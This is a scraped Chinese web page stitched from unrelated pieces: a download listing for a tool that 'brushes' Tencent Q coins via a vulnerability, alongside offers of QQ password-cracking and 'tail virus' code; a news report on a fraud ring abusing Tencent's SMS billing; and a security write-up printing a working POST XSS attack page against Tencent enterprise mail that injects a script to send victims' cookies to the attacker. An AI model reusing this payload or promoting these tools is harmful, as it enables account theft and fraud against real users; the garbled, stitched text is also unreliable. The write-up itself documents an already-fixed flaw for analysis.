现在腾迅公司的刷砖漏洞是否thc ssl dos 修补漏洞了?

qq2010 ***币,利用腾讯公司的漏洞,为QQ号充值 ICQ-IM-Chat 238万源代码下载-
&文件名称: qq2010
& & & & &&]
&&所属分类:
&&开发工具: QT
&&文件大小: 852 KB
&&上传时间:
&&下载次数: 227
&&提 供 者:
&详细说明:***币,利用腾讯公司的漏洞,为QQ号充值-Brush Q coins, use Tencent' s vulnerability, to recharge No. QQ
文件列表(点击判断是否您需要的文件,如果是垃圾请在下面评价投诉):
&&eAPI.fne&&HtmlView.fne&&iext2.fne&&krnln.fnr&&QQ网游一卡通刷卡充值机.exe
&相关搜索:
&输入关键字,在本站238万海量源码库中尽情搜索:
&[] - 详细描述 破解 QQ2009的密码后台记录过程与核心思路;
并根据逐步排查漏洞分析,找到最终的突破口;可以做木马用;提供一个思路
&[] - 算法书里不可多得的好书,王晓东的第二版,电子工业出版社
&[] - visualC++面对对象与可视化程序设计
&[] - QQ空间超强人气外挂
快来下吧呵呵 不错的 哦
&[] - 校内网好友***辅助工具,功能不是很完善,大家可以继续开发,最新情况在
http://zihanlion.
&[] - 这是一款根据腾讯的漏洞用易语言开发的 一款***币软件 一天最多1000
&[] - QQ2010尾巴病毒 可以给 QQ 发送 自定义的网址和消息
&[] - 捷易通网站源码推广平台整站程序,数据库为mysql
&[] - QQ***
呵呵,假的,唬人玩不错!!不过可别去做非法事情哦!
&[] - QQ空间助手
空间刷人气 刷留言 无限刷日记人气男子利用漏洞“爆卡***”致腾讯损失超千万_新浪天津乐购_新浪天津
男子利用漏洞“爆卡***”致腾讯损失超千万
新浪原创评论
  利用腾讯公司与手机通信运营商之间结算费用的时间差,通过在网上大量购买余额不足的不记名手机卡,使用该手机卡短信定制腾讯公司QQ会员服务,再将QQ会员服务卖给网上买家。数日后,腾讯公司在与手机通信运营商结算账目时却因为余额不足无法结算。常乐等人就是这样,在短短的十个月时间里致腾讯公司损失上千万元。近日,江苏省徐州市云龙区检察院以涉嫌诈骗罪对常乐等7人依法提起公诉。
  自主创业梦想成为CEO
  今年23岁的小伙子常乐在徐州经营一家网络工作室。对于学习计算机网络专业的他来说,开展点卡平台业务可谓轻车熟路。
  早在读大学的时候,常乐曾梦想将来成为马云式的网络CEO,并尝试自主创业。他曾以1500元的价格从一家网络公司购买了一个点卡平台,主要经营话费、游戏点卡、软件服务的充值以及一些类似于淘宝的交易系统。
  近年来,腾讯公司的Q钻产品在网上销售火爆,依据红、蓝、紫、粉等不同颜色等级的划分,拥有不同等级的Q钻者在进行QQ游戏或者其他QQ业务时享有不同等级特权,故钻级销售价格也从10元至20元不等,按月结算。常乐瞅准机会,于2011年5月开始“招兵买马”,通过点卡平台向买家发布销售Q钻信息,从中获利。
  然而经过两个月的经营,常乐发现销售情况并不乐观,收益甚微,他有点不甘心。
  网上聊天发现“赚钱之道”
  2012年初,常乐发现在自己的交易平台里出现了几个“***钻”供货商。通过和他们聊天,常乐学会了“爆卡***钻”的“赚钱之道”。
  据常乐交代,开通Q钻有一种方式是通过手机短信定制,用手机话费付款。这种方式是先开通后付费,即Q钻开通三天后甚至更长时间里由移动、电信公司代为扣除相应定制手机卡的资讯费来充抵。正是“先开通后付费”的缴费模式给了常乐这些人可乘之机。
  所谓“爆卡***钻”,就是通过大量低买余额不足的不记名手机卡,发短信定制Q钻后出售给网上买家,事后由于该手机卡上的余额不足以支付所定制的Q钻的费用,致使腾讯公司在与手机通信运营商结算账目时无法获得对价服务费。爆刷者无本万利,而腾讯公司却损失惨重。
  常乐发现这个“赚钱之道”后,重组人马,雇来常毅、郑吉翔、佟亮,准备大干一场。为此,常乐还专门订购了5台用于自动发送定制短信的“短信猫池”设备。“短信猫池”体积不大,功能却十分了得,其上面可以直接插8至16张手机SIM卡,与电脑相连后,一张卡在一分钟内就可以完成一次Q钻业务定制任务。
  “草台班子”网上摆摊
  经过精心挑选,常乐选择在某网站上摆摊卖“钻”。
  据常乐交代,在该网站上只要注册成为会员,缴纳会费,卖家就可以在该网上出售商品,缴纳的会费越多或者再建立一个专属于个人的子网络平台账号,那么在网站上的排名就会靠前,点击量也会越多,这样销路自然会好。
  “舍不得孩子套不着狼”,常乐花3万元开通了一个最高级别的账号,利用该网发布出售Q钻信息。为了招揽生意,常乐以腾讯官网四分之一到三分之一不等的价格卖起“钻”来。薄利就能多销,常乐的生意顿时火爆起来。
  “一张从广东买来的手机卡,卡的余额约5元钱。开通一个Q钻需要至少3条短信,如果是开通10个Q钻,需要至少30条短信。这就需要大概3元钱,剩下的钱用来备用,一旦发错了短信,我还可以重新发送。按照打过折后价格约算,一张卡至少能获利10元至20元。”说起自己的如意算盘,常乐十分得意。
  截至案发,常乐带领他的“草台班子”疯狂作案获利86万余元,除了日常运营开支外,常乐用这些钱贷款买了车,还在徐州最好的小区买了房准备再大干一场。
  多伙人竞相***诈骗
  对于网上骗***钻的行为,提供网络服务的腾讯公司早在2010年9月就有觉察,也相继采取了技术对抗措施,通过对手机号码归属地和QQ归属地的查询,对发现的部分骗***钻的QQ号码予以限制使用。可是由于不记名手机卡太多,公司对此一一比对牵扯精力太大,短时间内无法全部杜绝使用。
  对于腾讯公司的反制,常乐玩起了“躲猫猫”,在网上提供专门***,凡有客户提出其购买的Q钻被腾讯公司限制使用,常乐等人都会为该客户再如法炮制开通一个新Q钻服务,保证客户所开通Q钻能够达到自己许诺的使用期限。
  2012年10月,腾讯公司正式报案,网名叫酷兜兜的常乐进入警方视野,经网警大队进一步侦查,常乐案发。
  经查,网上同时另有李冰、戴志坤、史新阳三拨人如法“钻营”获利。他们的行为共给腾讯公司造成上千万元的损失。
  徐州市云龙区检察院办案检察官认为,常乐等人的行为是典型的诈骗犯罪。“爆卡***”犯罪行为的发生,反映出腾讯公司在业务费用结算方面及业务销售安全监管方面存在的漏洞。在该院建议下,目前,腾讯公司正在查漏补缺,避免此类案件再次发生。同时,该院还建议相关通信公司加强对余额不足的不记名卡的监控,严格售卡实名制度。
营养滋补又健康的美味
探店:喜欢:评论:
超火爆的美味小吃
探店:喜欢:评论:
炎热夏季里的清凉味道
探店:喜欢:评论:更好更安全的互联网
Author: Evi1m0#KnownSec
中午朋友发来一个帖子询问我是什么原理,之后和 RickGray 看了下是利用腾讯企业邮箱的 POST XSS 进行的盗取登录操作,从而登录受害者邮箱获取 APPLE ID。(目前腾讯已经修复此漏洞)
Target: .cn/
View-Source:
源码写入两个 iframe ,恶意代码在 /htmlpage5.html 中:
&meta charset="utf-8" /&
&title&qqjs4&/title&
function test(PARAMS) {
var temp = document.createElement("form");
temp.acceptCharset = "utf-8";
temp.action = 'http://m./cgi-bin/login';
temp.method = "post";
temp.style.display = "none";
for (var x in PARAMS) {
var opt = document.createElement("textarea");
opt.name =
opt.value = PARAMS[x];
temp.appendChild(opt);
document.body.appendChild(temp);
temp.submit();
uin: '\\&&/script&&script src=/q/8&&/script&',
1234567891011121314151617181920212223242526272829
&html&&head&&&&&&meta charset="utf-8" /&&&&&&title&qqjs4&/title&&/head&&body&&&&&&script&&&&&&&&&function test(PARAMS) {&&&&&&&&&&&&var temp = document.createElement("form");&&&&&&&&&&&&temp.acceptCharset = "utf-8";&&&&&&&&&&&&//By Wfox&&&&&&&&&&&&temp.action = 'http://m./cgi-bin/login';&&&&&&&&&&&&temp.method = "post";&&&&&&&&&&&&temp.style.display = "none";&&&&&&&&&&&&for (var x in PARAMS) {&&&&&&&&&&&&&&&&var opt = document.createElement("textarea");&&&&&&&&&&&&&&&&opt.name = x;&&&&&&&&&&&&&&&&opt.value = PARAMS[x];&&&&&&&&&&&&&&&&temp.appendChild(opt);&&&&&&&&&&&&}&&&&&&&&&&&&document.body.appendChild(temp);&&&&&&&&&&&&temp.submit();&&&&&&&&}&&&&&&&&test({&&&&&&&&&&&&uin: '\\&&/script&&script src=/q/8&&/script&',&&&&&&&&});&&&&&/script&&/body&&/html&
脚本创建 action 目标为腾讯企业邮箱的登录地址 form 表单,调用 test() 函数传入 uin 的参数值为 XSS Payload。
// 这个 POST 反射型 XSS 是由于企业邮箱登录报错未做过滤处理导致:
参数 uin ,攻击者注入 /q/8 脚本:
Payload 将获取企业邮箱的 document.cookie & document.referrer 并发送给攻击者。
注:因腾讯企业邮箱不仅仅需要 Cookie 还需要登录成功后 URL sid 等信息;
作者:niubl | Categories: | Tags:

参考资料

 

随机推荐